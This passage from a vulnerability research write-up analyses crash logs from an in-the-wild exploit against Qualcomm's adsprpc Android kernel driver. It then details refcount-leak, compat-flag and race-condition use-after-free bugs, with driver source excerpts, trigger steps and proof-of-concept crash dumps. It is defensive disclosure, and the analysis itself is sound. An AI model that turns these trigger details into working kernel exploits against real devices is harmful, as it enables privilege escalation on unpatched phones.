    [   50.865735] Call trace:

    [   50.865739]  __list_del_entry_valid+0x34/0xd0

    [   50.865742]  dma_buf_detach+0x34/0xa0

    [   50.865746]  fastrpc_mmap_free+0x3e8/0x4d0

    [   50.865749]  fastrpc_file_free+0x1a8/0x2e0

    [   50.865753]  fastrpc_device_release+0x50/0x68

    [   50.865757]  __fput+0xb8/0x1b0

    [   50.865762]  ____fput+0xc/0x18

    [   50.865764]  task_work_run+0x8c/0xb0

    [   50.865767]  do_exit+0x3fc/0xa10

    [   50.865770]  do_group_exit+0x8c/0xa0

    [   50.865773]  get_signal+0x7c8/0x958

    [   50.865778]  do_notify_resume+0x148/0x23e8

    [   50.865781]  work_pending+0x8/0x10

    [   50.865785] Code: f9400669 91040042 eb02013f 54000260 (f9400122)

    [   50.865789] ---[ end trace 42c589b65f43d4ee ]---

    [   50.865802] Kernel panic - not syncing: Fatal exception

    We see right away from the first panic that the exploit appears to be targeting a driver called adsprpc. We also see from the stacktrace that the crash is happening when freeing a fastrpc_mmap struct - so it seems likely this is a heap exploit of some sort, and that a fastrpc_mmap struct is potentially involved.

    Log 2:

    [   37.450199] adsprpc: fastrpc_init_process: untrusted app trying to attach to privileged DSP PD

    [   37.482741] adsprpc: mapping not found to unmap fd 0xffffffff, va 0xffffffffffffffff, len 0xffffffff

    [   37.482759] adsprpc: falcon: fastrpc_internal_mmap: ERROR: adding user allocated pages is not supported

    [   37.486210] adsprpc: mapping not found to unmap fd 0xa, va 0x0, len 0x0

    ...

    [   40.917577] adsprpc: ERROR:fastrpc_mmap_free, Invalid channel id: 1702834303, err:-44

    ...

    [   41.970037] adsprpc: ERROR:fastrpc_mmap_free, Invalid channel id: 1702834303, err:-44

    ...

    [   51.052781] adsprpc: ERROR:fastrpc_mmap_free, Invalid channel id: 1702834303, err:-44

    ...

    [   73.964765] adsprpc: ERROR:fastrpc_mmap_free, Invalid channel id: 1702834303, err:-44

    ...

    [   83.030394] adsprpc: ERROR:fastrpc_mmap_free, Invalid channel id: 1702834303, err:-44

    ...

    [   86.358103] Unable to handle kernel paging request at virtual address 0035fb968c5d536d

    [   86.358118] Mem abort info:

    [   86.358122]   ESR = 0x96000044

    [   86.358127]   Exception class = DABT (current EL), IL = 32 bits

    [   86.358131]   SET = 0, FnV = 0

    [   86.358135]   EA = 0, S1PTW = 0

    [   86.358139] Data abort info:

    [   86.358143]   ISV = 0, ISS = 0x00000044

    [   86.358147]   CM = 0, WnR = 1

    [   86.358151] [0035fb968c5d536d] address between user and kernel address ranges

    [   86.358159] Internal error: Oops: 96000044 [#1] PREEMPT SMP

    ...

    [   86.358221] Process falcon (pid: 7053, stack limit = 0x00000000a7dfa97f)

    [   86.358230] CPU: 0 PID: 7053 Comm: falcon Tainted: G S         O      4.19.157-perf-g8779875ad741 #1

    [   86.358235] Hardware name: Qualcomm Technologies, Inc. xiaomi apollo (DT)

    [   86.358241] pstate: 60400005 (nZCv daif +PAN -UAO)

    [   86.358259] pc : fastrpc_file_free+0x1c4/0x2e0

    [   86.358264] lr : fastrpc_file_free+0x198/0x2e0

    [   86.358268] sp : ffffff80264d3a50

    ...

    [   86.358352] Call trace:

    [   86.358359]  fastrpc_file_free+0x1c4/0x2e0

    [   86.358364]  fastrpc_device_release+0x50/0x68

    [   86.358374]  __fput+0xb8/0x1b0

    [   86.358380]  ____fput+0xc/0x18

    [   86.358387]  task_work_run+0x8c/0xb0

    [   86.358394]  do_exit+0x3fc/0xa10

    [   86.358399]  do_group_exit+0x8c/0xa0

    [   86.358405]  get_signal+0x7c8/0x958

    [   86.358412]  do_notify_resume+0x148/0x23e8

    [   86.358418]  work_pending+0x8/0x10

    [   86.358424] Code: b4ffff68 f9400009 f9000109 b4fffee9 (f9000528)

    [   86.358430] ---[ end trace 9b01c55ca2d0bfea ]---

    [   86.358452] Kernel panic - not syncing: Fatal exception

    Here’s another crash in the adsprpc driver, this time associated with a fastrpc_file struct, which is associated with a struct file, which is itself the backing object referenced by a file descriptor. We also see that the exploit appears to have gotten further through the exploit process this time, making multiple calls to fastrpc_mmap_free. Notably, the channel id is set to the very large value 1702834303. Channel ids can’t usually be set this high: while the maximum varies from version to version, valid channel ids range from 0 to about 6, so it’s clear that the channel id (cid) has somehow been corrupted. It is also notable that the channel id is set to a Unix epoch timestamp value - something Donncha of Amnesty noticed in the course of the investigation. 1702834303 represents the date Sunday, December 17, 2023 5:31:43 PM, which is quite close to when the exploit was thrown…why could this be?
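The timestamp observation is easy to check, assuming the value is interpreted as seconds since the Unix epoch in UTC:

```python
from datetime import datetime, timezone

# The corrupted channel id from Log 2, decoded as a Unix timestamp:
cid = 1702834303
print(datetime.fromtimestamp(cid, tz=timezone.utc))
# 2023-12-17 17:31:43+00:00 (Sunday, December 17, 2023, 5:31:43 PM UTC)
```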

    Log 3:

    [ 2244.639158] adsprpc: ERROR: fastrpc_internal_mmap: user application falcon trying to map without initialization

    ...

    [ 2244.641272] adsprpc: falcon: fastrpc_init_process: ERROR: donated memory allocated in userspace

    [ 2244.683779] adsprpc: mapping not found to unmap fd 0xffffffff, va 0xffffffffffffffff, len 0xffffffff

    [ 2244.683794] adsprpc: falcon: fastrpc_internal_mmap: ERROR: adding user allocated pages is not supported

    [ 2244.689633] adsprpc: mapping not found to unmap fd 0x9, va 0x0, len 0x0

    [ 2247.159424] Unable to handle kernel paging request at virtual address 006f7778a9cf5b88

    [ 2247.159442] Mem abort info:

    [ 2247.159446]   ESR = 0x96000004

    [ 2247.159453]   Exception class = DABT (current EL), IL = 32 bits

    [ 2247.159458]   SET = 0, FnV = 0

    [ 2247.159462]   EA = 0, S1PTW = 0

    [ 2247.159468] Data abort info:

    [ 2247.159472]   ISV = 0, ISS = 0x00000004

    [ 2247.159476]   CM = 0, WnR = 0

    [ 2247.159481] [006f7778a9cf5b88] address between user and kernel address ranges

    [ 2247.159489] Internal error: Oops: 96000004 [#1] PREEMPT SMP

    ...

    [ 2247.159572] Process falcon (pid: 17512, stack limit = 0x00000000c911fea5)

    [ 2247.159582] CPU: 0 PID: 17512 Comm: falcon Tainted: G S      W  O      4.19.157-perf-g8779875ad741 #1

    [ 2247.159587] Hardware name: Qualcomm Technologies, Inc. xiaomi apollo (DT)

    [ 2247.159595] pstate: 60400005 (nZCv daif +PAN -UAO)

    [ 2247.159614] pc : __kmalloc+0x1c4/0x398

    [ 2247.159619] lr : __kmalloc+0x60/0x398

    [ 2247.159623] sp : ffffff8029173b80

    ...

    [ 2247.159719] Call trace:

    [ 2247.159727]  __kmalloc+0x1c4/0x398

    [ 2247.159740]  inotify_handle_event+0xc8/0x1c8

    [ 2247.159746]  fsnotify+0x270/0x378

    [ 2247.159753]  __fsnotify_parent+0xdc/0x138

    [ 2247.159763]  notify_change2+0x314/0x348

    [ 2247.159771]  do_sys_ftruncate+0x190/0x1c0

    [ 2247.159776]  __arm64_sys_ftruncate+0x1c/0x28

    [ 2247.159786]  el0_svc_common+0x98/0x160

    [ 2247.159792]  el0_svc_handler+0x68/0x80

    [ 2247.159800]  el0_svc+0x8/0xc

    [ 2247.159808] Code: b4000a77 b940230a f940bf0b 8b0a02ea (f940014c)

    [ 2247.159815] ---[ end trace 3729c600fbf1ba28 ]---

    [ 2247.159842] Kernel panic - not syncing: Fatal exception

    Again we see adsprpc driver logs, but it culminates in a crash within the context of the exploit process in a different part of the code entirely - this time from the inotify subsystem. We will revisit the importance of this crash later.

    Log 4:

    [   67.167510] adsprpc: fastrpc_init_process: untrusted app trying to attach to privileged DSP PD

    [   67.202061] adsprpc: mapping not found to unmap fd 0xffffffff, va 0xffffffffffffffff, len 0xffffffff

    [   67.202084] adsprpc: falcon: fastrpc_internal_mmap: ERROR: adding user allocated pages is not supported

    [   67.207916] adsprpc: mapping not found to unmap fd 0xa, va 0x0, len 0x0

    [   69.577152] adsprpc: ERROR:fastrpc_mmap_free, Invalid channel id: 1702832054, err:-44

    [   70.621863] adsprpc: ERROR:fastrpc_mmap_free, Invalid channel id: 1702832054, err:-44

    ...

    [   79.689300] adsprpc: ERROR:fastrpc_mmap_free, Invalid channel id: 1702832054, err:-44

    ...

    [   97.574406] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000009

    [   97.574435] Mem abort info:

    [   97.574445]   ESR = 0x96000006

    [   97.574457]   Exception class = DABT (current EL), IL = 32 bits

    [   97.574467]   SET = 0, FnV = 0

    [   97.574476]   EA = 0, S1PTW = 0

    [   97.574485] Data abort info:

    [   97.574495]   ISV = 0, ISS = 0x00000006

    [   97.574504]   CM = 0, WnR = 0

    [   97.574522] user pgtable: 4k pages, 39-bit VAs, pgdp = 00000000ad40fd5a

    [   97.574532] [0000000000000009] pgd=00000001cadcb003, pud=00000001cadcb003, pmd=0000000000000000

    [   97.574554] Internal error: Oops: 96000006 [#1] PREEMPT SMP

    ...

    [   97.574680] Process falcon (pid: 10050, stack limit = 0x00000000eac9e565)

    [   97.574700] CPU: 0 PID: 10050 Comm: falcon Tainted: G S         O      4.19.157-perf-g8779875ad741 #1

    [   97.574711] Hardware name: Qualcomm Technologies, Inc. xiaomi apollo (DT)

    [   97.574726] pstate: 00400005 (nzcv daif +PAN -UAO)

    [   97.574756] pc : pipe_read+0xac/0x308

    [   97.574769] lr : pipe_read+0x4c/0x308

    [   97.574778] sp : ffffff802e43bc80

    ...

    [   97.574982] Call trace:

    [   97.574996]  pipe_read+0xac/0x308

    [   97.575014]  __vfs_read+0xf8/0x140

    [   97.575027]  vfs_read+0xb8/0x150

    [   97.575039]  ksys_read+0x6c/0xd0

    [   97.575053]  __arm64_sys_read+0x18/0x20

    [   97.575071]  el0_svc_common+0x98/0x160

    [   97.575083]  el0_svc_handler+0x68/0x80

    [   97.575097]  el0_svc+0x8/0xc

    [   97.575114] Code: aa1c03fb aa1c03e1 b840ce68 f8410f69 (f9400529)

    [   97.575127] ---[ end trace 72c08623f6dedcd7 ]---

    [   97.575174] Kernel panic - not syncing: Fatal exception

    We see here a fourth type of crash, this time in the pipe subsystem. Pipe buffers are often used as a spray object for heap exploitation, and it wouldn’t be terribly surprising if that were the case here.

    There are several valuable pieces of information to glean from the logs - the most meaningful being the usage of this adsprpc driver. We also see log lines from several adsprpc functions:

    • fastrpc_init_process
    • fastrpc_internal_munmap_fd
    • fastrpc_internal_mmap
    • fastrpc_mmap_free

    It is likely the bug used by the attacker resides somewhere in the relationships between these functions, but exactly where is not clear from the logs alone. The functions that are executed by the exploit only serve to complicate the investigation, as the exploit seems to constantly hit very early bailouts that shouldn’t cause any change in kernel state whatsoever.

    Upon additional investigation (by Jann Horn in particular!) it became clear that this driver is accessible from a spectrum of unprivileged contexts. untrusted_app does not have the ability to directly open the driver device file, but at least on some devices it can obtain limited access by receiving a file descriptor to the device file from the dspservice process through the IDspService HAL interface, which is reachable through hwbinder.

    As we’ve seen before, third-party Android drivers are an appealing attack surface, regularly supplying a reservoir of potential vulnerabilities to attackers. While it wasn’t immediately clear which vulnerability the attackers had exploited, it was clear that a more thorough audit of this driver was warranted.

    The adsprpc Driver

    The Application Digital Signal Processor Remote Procedure Call driver (or adsprpc for short) is primarily used for offloading multimedia processing to a more efficient DSP co-processor core. The driver is usually accessed through the /dev/adsprpc-smd character device file, although historically it could be reached via a variety of device files including cdsprpc-smd and mdsprpc-smd. The driver’s architecture is thoroughly described in the kernel documentation. Through this driver, co-processor routines are exposed to the application processor userland (including untrusted_app processes) via an RPC interface, providing an efficient abstraction by which multimedia processing can be offloaded to the specialized hardware in the SoC. Through the use of DMA buffers that are mapped directly onto the DSP core, adsprpc minimizes the amount of data copied across the processor boundary. This feature set is necessarily complex, and that makes it a ripe target for in-depth security research.

    The Bughunt Begins

    Having given up on discovering the bug exploited in the ITW logs directly, it was time to start a broader code review process. This turned out to be a very productive research decision. Jann found the first bug quite quickly, and over the course of the next several months, I found 5 more. I’ve described each of the bugs below.

    CVE-2024-38402: refcount leak leading to UAF in fastrpc_get_process_gids

    The first discovered vulnerability in the driver is a refcount leak on the group_info struct associated with the task, leading to a UAF. In the function fastrpc_get_process_gids, get_current_groups is called, which increments a refcount on the group_info struct, but that refcount is never dropped. Furthermore, this is a non-saturating refcount, which makes it possible to overflow by executing fastrpc_get_process_gids approximately 2^32 times. This is a difficult bug to exploit in practice, taking at least 14 hours to trigger, but it’s nevertheless memory corruption with all the associated consequences. An example crash from this issue is below:

    [77306.174599] [7:           adbd: 5455] BUG: KFENCE: invalid read in groups_to_user+0x34/0x1a4 

     

    [77306.174606] [7:           adbd: 5455] Invalid read at 0xffffff89572a0000: 

    [77306.174607] [7:           adbd: 5455]  groups_to_user+0x34/0x1a4 

    [77306.174609] [7:           adbd: 5455]  invoke_syscall+0x58/0x13c 

    [77306.174612] [7:           adbd: 5455]  el0_svc_common+0xb4/0xf0 

    [77306.174614] [7:           adbd: 5455]  do_el0_svc+0x24/0x90 

    [77306.174615] [7:           adbd: 5455]  el0_svc+0x20/0x7c 

    [77306.174617] [7:           adbd: 5455]  el0t_64_sync_handler+0x84/0xe4 

    [77306.174618] [7:           adbd: 5455]  el0t_64_sync+0x1b8/0x1bc 

    [77306.174620] [7:           adbd: 5455]   

    [77306.174621] [7:           adbd: 5455] CPU: 7 PID: 5455 Comm: adbd Tainted: G S      W  OE     5.15.123-android13-8-28577312-abS911BXXU3CXD3 #1 

    [77306.174623] [7:           adbd: 5455] Hardware name: Samsung DM1Q PROJECT (board-id,13) (DT) 

    [77306.174624] [7:           adbd: 5455] pstate: 22400005 (nzCv daif +PAN -UAO +TCO -DIT -SSBS BTYPE=--) 

    [77306.174626] [7:           adbd: 5455] pc : groups_to_user+0x34/0x1a4 

    [77306.174628] [7:           adbd: 5455] lr : __arm64_sys_getgroups+0x4c/0x6c 

    [77306.174629] [7:           adbd: 5455] sp : ffffffc02a073e00 

    [77306.174630] [7:           adbd: 5455] x29: ffffffc02a073e00 x28: ffffff8868030040 x27: 0000000000000000 

    [77306.174633] [7:           adbd: 5455] x26: 0000000000000000 x25: 0000000000000000 x24: 0000000000000000 

    [77306.174635] [7:           adbd: 5455] x23: 0000000060001000 x22: 00000077219a4f2c x21: ffffff8868030040 

    [77306.174637] [7:           adbd: 5455] x20: ffffffc0081bd46c x19: 000000006b6b6b6b x18: ffffffc016089000 

    [77306.174638] [7:           adbd: 5455] x17: 000000000000fffe x16: b4000074e392f638 x15: ffffff895729fff8 

    [77306.174640] [7:           adbd: 5455] x14: 00000000524e68f8 x13: ffffff8868030040 x12: ffffffc00ad82000 

    [77306.174641] [7:           adbd: 5455] x11: 0000007fffffffff x10: ffffffc00aa93000 x9 : 0000000014939a3e 

    [77306.174643] [7:           adbd: 5455] x8 : 000000006b6b6b6b x7 : 0000000000000000 x6 : 0000000000000000 

    [77306.174645] [7:           adbd: 5455] x5 : 0000000000000000 x4 : 0000000000000000 x3 : 0000000000000000 

    [77306.174646] [7:           adbd: 5455] x2 : 0000000000000040 x1 : ffffff8904db9700 x0 : b400007491448d40 

    [77306.174648] [7:           adbd: 5455] Call trace: 

    [77306.174648] [7:           adbd: 5455]  groups_to_user+0x34/0x1a4 

    [77306.174650] [7:           adbd: 5455]  invoke_syscall+0x58/0x13c 

    [77306.174651] [7:           adbd: 5455]  el0_svc_common+0xb4/0xf0 

    [77306.174653] [7:           adbd: 5455]  do_el0_svc+0x24/0x90 

    [77306.174654] [7:           adbd: 5455]  el0_svc+0x20/0x7c 

    [77306.174655] [7:           adbd: 5455]  el0t_64_sync_handler+0x84/0xe4 

    [77306.174656] [7:           adbd: 5455]  el0t_64_sync+0x1b8/0x1bc 

    CVE-2024-21455: is_compat flag leads to access of userland provided addresses as kernel pointers

    In order to support 32-bit userland processes, 64-bit kernels contain a “compatibility layer” that ioctls can support. This layer is responsible for marshaling 32-bit structs into their 64-bit equivalents, which involves upcasting 32-bit userland pointers into 64-bit pointers. The adsprpc driver handles this case in the adsprpc_compat.c file. It allocates kernel memory, copies and converts the 32-bit struct into that kernel memory as a 64-bit struct, and then calls the 64-bit ioctl interface. The 64-bit ioctl interface thus needs to handle calls coming from both the 32-bit kernel compatibility layer and from 64-bit userland. To distinguish the two, the 32-bit compatibility layer indicates to the broader adsprpc driver that it is in use by setting a flag, is_compat, in the file-descriptor-bound fl struct.

    long compat_fastrpc_device_ioctl(struct file *filp, unsigned int cmd,

                                    unsigned long arg)

    {

            int err = 0;

            struct fastrpc_file *fl = (struct fastrpc_file *)filp->private_data;

            if (!filp->f_op || !filp->f_op->unlocked_ioctl)

                    return -ENOTTY;

            fl->is_compat = true;

    ...

    }

    Later on, that is_compat flag is used in calls to K_COPY_FROM_USER to make decisions about whether to use memmove (32-bit compatibility layer or other kernel invocation) or copy_from_user.

    #define K_COPY_FROM_USER(err, kernel, dst, src, size) \

            do {\

                    if (!(kernel))\

                            err = copy_from_user((dst),\

                            (void const __user *)(src),\

                            (size));\

                    else\

                            memmove((dst), (src), (size));\

            } while (0)

    ...
    int fastrpc_internal_invoke2(struct fastrpc_file *fl,

                                    struct fastrpc_ioctl_invoke2 *inv2)

    {

    switch (inv2->req) {

            case FASTRPC_INVOKE2_ASYNC:

                    ...

                            K_COPY_FROM_USER(err, fl->is_compat, &p.inv3, (void*)inv2->invparam, sizeof(struct fastrpc_ioctl_invoke_async_no_perf));

    ...

    }

    However, this flag is set at a relatively global level in that any other ioctl calls on the same file descriptor will see that this flag is set. Furthermore, once the flag is set, it is never UNset. Consider the following scenario:

    1. A malicious 64-bit process A opens the adsprpc-smd file, creating a new adsprpc file descriptor
    2. Process A forks and creates a new 32-bit process B (A and B share the adsprpc fd/fl)
    3. Process B invokes the 32-bit ioctl interface (thus setting the is_compat flag) and exits
    4. Process A invokes the 64-bit ioctl interface

    In this circumstance, the driver incorrectly thinks that the request is coming from the 32-bit compatibility layer (since is_compat is set) and accesses the struct as if it contained kernel pointers. In fact, the request came from 64-bit userland and contains untrusted, userland-provided pointers (which a malicious caller can set to kernel addresses!). The kernel subsequently uses an unsafe memmove to access these pointers, leading to userland-controlled reads of kernel addresses.

    [49468.514358] Unable to handle kernel paging request at virtual address ffffffff41414141

    [49468.514397] PC Code: d65f03c0 d503201f (a9401c26) a9412428

    [49468.514407] LR Code: 340003a8 957474dd (f9401be8) f90023e8

    [49468.514413] Mem abort info:

    [49468.514418] ESR = 0x96000005

    [49468.514426] EC = 0x25: DABT (current EL), IL = 32 bits

    [49468.514433] SET = 0, FnV = 0

    [49468.514440] EA = 0, S1PTW = 0

    [49468.514445] FSC = 0x05: level 1 translation fault

    [49468.514452] Data abort info:

    [49468.514456] ISV = 0, ISS = 0x00000005

    [49468.514463] CM = 0, WnR = 0

    [49468.514469] swapper pgtable: 4k pages, 39-bit VAs, pgdp=00000000aa728000

    [49468.514479] [ffffffff41414141] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000

    [49468.514502] Internal error: Oops: 96000005 [#1] PREEMPT SMP

    [49468.514780] sec_arm64_ap_context:sec_arm64_ap_context_on_die() context saved (CPU:6)

    [49468.514788] Modules linked in: [...]

    [49468.516301] CPU: 6 PID: 17448 Comm: poc_compat_pare Tainted: G S      W  OE     5.15.123-android13-8-28577312-abS911BXXU3CXD3 #1

    [49468.516312] Hardware name: Samsung DM1Q PROJECT (board-id,13) (DT)

    [49468.516317] pstate: 22400005 (nzCv daif +PAN -UAO +TCO -DIT -SSBS BTYPE=--)

    [49468.516326] pc : __memcpy+0x90/0x250

    [49468.516339] lr : fastrpc_internal_invoke2+0x308/0x408 [frpc_adsprpc]

    [49468.516471] sp : ffffffc02fe33ba0

    [49468.516475] x29: ffffffc02fe33cb0 x28: ffffff894341bb80 x27: 0000000000000000

    [49468.516489] x26: 0000000000000000 x25: 0000000000000000 x24: ffffff891fe6c5c0

    [49468.516499] x23: 00000000ffffffe7 x22: ffffff8939eff010 x21: 00000000c0185212

    [49468.516510] x20: 0000007fe5890e40 x19: ffffff8939eff000 x18: ffffffc017b37010

    [49468.516520] x17: 0000000000000000 x16: 0000000000000000 x15: 0000007fe5890e40

    [49468.516530] x14: ffffff80011f6480 x13: 0000000000000000 x12: ffffff8034b27ce8

    [49468.516540] x11: 0000000000000010 x10: ffffffc002443654 x9 : 0000000000000008

    [49468.516549] x8 : 0000000000000001 x7 : 0000000000000001 x6 : ffffffc02fe33d30

    [49468.516559] x5 : ffffffc02fe33bd8 x4 : ffffffff41414171 x3 : 0000000000000008

    [49468.516568] x2 : 0000000000000030 x1 : ffffffff41414141 x0 : ffffffc02fe33ba8

    [49468.516577] Call trace:

    [49468.516582] __memcpy+0x90/0x250

    [49468.516593] fastrpc_device_ioctl+0x1b0/0x92c [frpc_adsprpc]

    [49468.516716] __arm64_sys_ioctl+0x120/0x170

    [49468.516734] invoke_syscall+0x58/0x13c

    [49468.516745] el0_svc_common+0xb4/0xf0

    [49468.516753] do_el0_svc+0x24/0x90

    [49468.516760] el0_svc+0x20/0x7c

    [49468.516771] el0t_64_sync_handler+0x84/0xe4

    [49468.516778] el0t_64_sync+0x1b8/0x1bc

    [49468.516790] Code: 382e6808 381ff0aa d65f03c0 d503201f (a9401c26)

    [49468.516799] ---[ end trace 9c87e0f40bf8f469 ]---

    This could plausibly be elevated directly into an arbitrary kernel read primitive.

    Understanding the fastrpc_mmap struct

    The adsprpc driver maintains some internal bookkeeping on which DMA buffers are mapped onto the co-processor via fastrpc_mmap structs. These structs are allocated and initialized in fastrpc_mmap_create and have several characteristics that substantially complicate their management. They can be on either an fl-local linked list (associated with a struct file) or a global linked list, depending on the flags used on creation. They have two separate refcounts, refs and ctx_refs, and they can be referenced from multiple places at once, including a context (an object that tracks data associated with a single RPC call), the global or local map lists, and of course transient stack-based references when being created or destroyed. A reference on an existing map is taken when fastrpc_mmap_create is called with a set of parameters that are fulfilled by an existing mapping.

    fastrpc_mmap objects can be created via several different codepaths: during context initialization, via two different dedicated ioctl handlers, during DSP initialization and process creation, and even by a request from the DSP itself. They can be freed through a reciprocal set of codepaths, such as context or struct file teardown, and via three different dedicated unmapping ioctls. We will examine several of these creation and destruction codepaths as I discuss three discovered bugs involving use-after-free of a fastrpc_mmap struct.

    CVE-2024-33060: UAF race of global maps in fastrpc_mmap_create (and epilogue functions)

    It is important to have a good understanding of the locking utilized for protecting these map lists from races in order to understand the first bug found:

    int fastrpc_internal_mem_map(struct fastrpc_file *fl,

                                    struct fastrpc_ioctl_mem_map *ud)

    {

            int err = 0;

            struct fastrpc_mmap *map = NULL;

            mutex_lock(&fl->internal_map_mutex);

            ...

            mutex_lock(&fl->map_mutex);

            VERIFY(err, !(err = fastrpc_mmap_create(fl, ud->m.fd, NULL, ud->m.attrs,

                            ud->m.vaddrin, ud->m.length,

                             ud->m.flags, &map)));

            mutex_unlock(&fl->map_mutex);

            if (err)

                    goto bail;

    ...
            
    //[1] map may already be globally visible

    VERIFY(err, !(err = fastrpc_mem_map_to_dsp(fl, ud->m.fd, ud->m.offset,

                    ud->m.flags, map->va, map->phys, map->size, &map->raddr)));

    if (err)

            goto bail;

    ud->m.vaddrout = map->raddr;

    bail:

            if (err) {

                    if (map) {

                            mutex_lock(&fl->map_mutex);

                            fastrpc_mmap_free(map, 0);

                            mutex_unlock(&fl->map_mutex);

                    }

            }

            mutex_unlock(&fl->internal_map_mutex);

            return err;

    }

    Two mutexes are held here, one of which is held throughout the lifetime of the function, including in the error condition bailout: fl->map_mutex and fl->internal_map_mutex. Both of these mutexes are bound to the fl struct, which is itself bound to the struct file associated with a file descriptor. These mutexes prevent concurrency between e.g. multiple fastrpc_internal_mem_map calls on the same file descriptor, but do not prevent concurrency with other fl structs (e.g. from a second open’d adsprpc-smd file descriptor) being used in the same ioctls. As these ioctls are often used to administer fl-local maps, global concurrency is often okay. However, fastrpc_mmap_create and fastrpc_internal_mem_map can create global maps too. And for global maps that are added to global structures, global mutexing is only briefly taken in fastrpc_internal_mem_map -> fastrpc_mmap_create -> fastrpc_mmap_add:

    static void fastrpc_mmap_add(struct fastrpc_mmap *map)

    {

            if (map->flags == ADSP_MMAP_HEAP_ADDR ||

                                    map->flags == ADSP_MMAP_REMOTE_HEAP_ADDR) {

                    struct fastrpc_apps *me = &gfa; //gfa is a global struct

                    unsigned long irq_flags = 0;

                    spin_lock_irqsave(&me->hlock, irq_flags); //Taken here

                    hlist_add_head(&map->hn, &me->maps);

                    spin_unlock_irqrestore(&me->hlock, irq_flags); //Dropped here

            } else {

                    struct fastrpc_file *fl = map->fl;

                    hlist_add_head(&map->hn, &fl->maps);

            }

    }

    This means that the global mutexing architecture is not enough to prevent two concurrent invocations of the fastrpc mapping ioctl calls, even if a global map is being created. This by itself is not a bug, but even after inserting a global map onto the global map list, fastrpc_internal_mem_map continues to access the map, even though it should really consider its reference to the global map “consumed”. Crucially, once a global map is created and added to the global list, it is immediately visible to concurrent callers - a thread calling fastrpc_internal_munmap with a different adsprpc fd / fl struct could destroy the global map while fastrpc_internal_mem_map continues to use it (see [1] in the above code sample from fastrpc_internal_mem_map). This is an example of continuing to use a transient reference after transferring that reference to a data structure whose resident objects have userland-managed lifetimes - another example would be using a struct file object after installing the only reference in a file descriptor table (via fd_install), at which point userland can drop the reference using the close(2) syscall.

    Triggering this bug generates the following kernel panic with PAGE_POISON enabled:

    [ 2890.558370] [0:            poc:22189] Unable to handle kernel paging request at virtual address 006b6b6b6b6b6b83

    [ 2890.558411] [0:            poc:22189] PC Code: 95ca6fb3 aa1703e0 2a1f03e1 97ffdbcc 2a1f03f6 14000008 f9400ae8 (f8418d09) f90002e9 b4000049 f9000537 f9000117 f90006e8 aa1403e0 95ca66a2 aa1303e0 95ca66a0 d5384108 f942f108 f94007e9

    [ 2890.558618] [0:            poc:22189] LR Code: 94000075 2a0003f6 aa1403e0 95ca66ed f94003f7 340006f6 b4000937 aa1403e0 95ca6feb (b94026e8) 7100211f 54000060 7100111f 54000721 b00000f8 91038318 91008315 aa1503e0 95ca97d3 f9400308

    [ 2890.558633] [0:            poc:22189] Mem abort info:

    [ 2890.558641] [0:            poc:22189]   ESR = 0x96000004

    [ 2890.558650] [0:            poc:22189]   EC = 0x25: DABT (current EL), IL = 32 bits

    [ 2890.558661] [0:            poc:22189]   SET = 0, FnV = 0

    [ 2890.558670] [0:            poc:22189]   EA = 0, S1PTW = 0

    [ 2890.558678] [0:            poc:22189]   FSC = 0x04: level 0 translation fault

    [ 2890.558688] [0:            poc:22189] Data abort info:

    [ 2890.558696] [0:            poc:22189]   ISV = 0, ISS = 0x00000004

    [ 2890.558704] [0:            poc:22189]   CM = 0, WnR = 0

    [ 2890.558713] [0:            poc:22189] [006b6b6b6b6b6b83] address between user and kernel address ranges

    [ 2890.558727] [0:            poc:22189] Internal error: Oops: 96000004 [#1] PREEMPT SMP

    [ 2890.559162] [0:            poc:22189] sec_arm64_ap_context:sec_arm64_ap_context_on_die() context saved (CPU:0)

    ...

    [ 2890.560996] [0:            poc:22189] CPU: 0 PID: 22189 Comm: poc Tainted: G S      W  OE     5.15.123-android13-8-28577312-abS911BXXU3CXD3 #1

    [ 2890.561007] [0:            poc:22189] Hardware name: Samsung DM1Q PROJECT (board-id,13) (DT)

    [ 2890.561014] [0:            poc:22189] pstate: 22400005 (nzCv daif +PAN -UAO +TCO -DIT -SSBS BTYPE=--)

    [ 2890.561024] [0:            poc:22189] pc : fastrpc_internal_munmap+0x1ac/0x264 [frpc_adsprpc]

    [ 2890.561202] [0:            poc:22189] lr : fastrpc_internal_munmap+0xb4/0x264 [frpc_adsprpc]

    [ 2890.561376] [0:            poc:22189] sp : ffffffc025ee3cc0

    [ 2890.561382] [0:            poc:22189] x29: ffffffc025ee3cd0 x28: ffffff88bf4fbb80 x27: 0000000000000000

    [ 2890.561397] [0:            poc:22189] x26: 0000000000000000 x25: 0000000000000000 x24: ffffff8922ae4301

    [ 2890.561411] [0:            poc:22189] x23: ffffff803bb30900 x22: 0000000080000448 x21: ffffff8928fb5800

    [ 2890.561424] [0:            poc:22189] x20: ffffff8928fb5910 x19: ffffff8928fb5940 x18: ffffffc00b492010

    [ 2890.561437] [0:            poc:22189] x17: 00000000000003e7 x16: 0000000000007e00 x15: 0000000000000600

    [ 2890.561450] [0:            poc:22189] x14: ffffff891cc57e00 x13: dee89d8ccc1e57a7 x12: 088000400811164c

    [ 2890.561463] [0:            poc:22189] x11: ffffff891cc51a00 x10: ffffff88bf4fbb80 x9 : 0000000000000000

    [ 2890.561476] [0:            poc:22189] x8 : 6b6b6b6b6b6b6b6b x7 : bbbbbbbbbbbbbbbb x6 : 00000000000000c0

    [ 2890.561489] [0:            poc:22189] x5 : 0000000000150009 x4 : ffffff891cc57400 x3 : 000000000015000a

    [ 2890.561502] [0:            poc:22189] x2 : ffffff88bf4fbb80 x1 : 0000000000000000 x0 : 0000000000000000

    [ 2890.561516] [0:            poc:22189] Call trace:

    [ 2890.561523] [0:            poc:22189]  fastrpc_internal_munmap+0x1ac/0x264 [frpc_adsprpc]

    [ 2890.561696] [0:            poc:22189]  fastrpc_device_ioctl+0x7e8/0x92c [frpc_adsprpc]

    [ 2890.561867] [0:            poc:22189]  __arm64_sys_ioctl+0x120/0x170

    [ 2890.561886] [0:            poc:22189]  invoke_syscall+0x58/0x13c

    [ 2890.561899] [0:            poc:22189]  el0_svc_common+0xb4/0xf0

    [ 2890.561908] [0:            poc:22189]  do_el0_svc+0x24/0x90

    [ 2890.561917] [0:            poc:22189]  el0_svc+0x20/0x7c

    [ 2890.561929] [0:            poc:22189]  el0t_64_sync_handler+0x84/0xe4

    [ 2890.561937] [0:            poc:22189]  el0t_64_sync+0x1b8/0x1bc

    [ 2890.561951] [0:            poc:22189] Code: 97ffdbcc 2a1f03f6 14000008 f9400ae8 (f8418d09)

    [ 2890.561967] [0:            poc:22189] ---[ end trace af6bd4fc06724258 ]---

